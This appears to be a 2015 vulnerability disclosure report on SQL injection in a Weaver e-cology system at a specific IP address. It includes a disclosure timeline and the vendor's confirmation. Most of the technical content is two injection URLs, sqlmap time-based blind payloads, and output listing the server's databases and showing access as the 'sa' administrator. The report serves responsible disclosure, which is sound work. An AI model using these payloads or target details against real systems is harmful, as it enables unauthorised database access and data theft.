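2015-09-01: Details sent to the vendor; awaiting vendor response
2015-09-02: Vendor confirmed; details disclosed to the vendor only
2015-09-12: Details disclosed to core white hats and experts in related fields
2015-09-22: Details disclosed to regular white hats
2015-10-02: Details disclosed to intern white hats
2015-10-17: Details disclosed to the public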
SQL injection
Weaver (泛微) system: http://60.10.8.227:88/login/Login.jsp?logintype=1
First injection point:
http://60.10.8.227:88/page/element/Weather/View.jsp?ebaseid=weather&eid=5*&styleid=1%27&hpid=4%27&subCompanyId=1%27&e71415018052415=%27
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: http://60.10.8.227:88/page/element/Weather/View.jsp?ebaseid=weather&eid=5 WAITFOR DELAY '0:0:5'&styleid=1'&hpid=4'&subCompanyId=1'&e71415018052415='
---
[00:18:17] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
Databases
available databases [8]:
[*] ecology7
[*] ecology_bak0119
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
Current database: ecology7
Current user: sa
Second injection point:
http://60.10.8.227:88//homepage/LoginHomepage.jsp?hpid=52*&isfromportal=1
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: http://60.10.8.227:88//homepage/LoginHomepage.jsp?hpid=52 WAITFOR DELAY '0:0:5'&isfromportal=1
---
[00:22:00] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
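Severity: Medium
Vulnerability Rank: 10
Confirmed at: 2015-09-02 10:41
Thanks to 路人甲 for the attention and contribution! We will notify the business unit to remediate right away! Please leave your QQ by private message so we can contact you. Thank you!
None yet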